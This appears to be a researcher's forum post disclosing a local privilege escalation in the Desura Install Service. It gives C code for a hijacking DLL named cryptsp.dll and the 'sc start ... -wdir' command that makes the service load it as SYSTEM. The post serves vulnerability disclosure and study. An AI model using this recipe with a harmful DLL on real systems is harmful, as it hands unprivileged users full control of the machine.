The following was a quick test I made in the far October 2012 and reported on ZenHAX in August 2014 ( "Desura is a digital distribution platform developed by Linden Research": Basically it's a competitor of Steam that, I remember, was mainly focused on indie games and then has been bought by Linden, the guys behind Second Life. Anyway it's just a local privilege escaltion to become SYSTEM by using an option of the installer service, not so important but interesting to show. Compile a dll with the name cryptsp.dll, the following is a quick example of dll for testing if you are able to write in a folder that requires Administrator privileges: Code: #include BOOL APIENTRY DllMain(HMODULE hModule, DWORD ulReason, LPVOID lpReserved) { if(ulReason == DLL_PROCESS_ATTACH) { system("echo HELLO > c:\\windows\\poc.txt"); Sleep(-1); } return TRUE; } Create an empty folder called bin and put the dll there. Kill/close the Desura client if it's running. Let's say your current folder is z:\poc and the dll is located in z:\poc\bin\cryptsp.dll Now start the service (any user can do that, just like with Steam) using the -wdir option: Code: sc start "Desura Install Service" -wdir z:\poc That's all. Source code of Desura Service: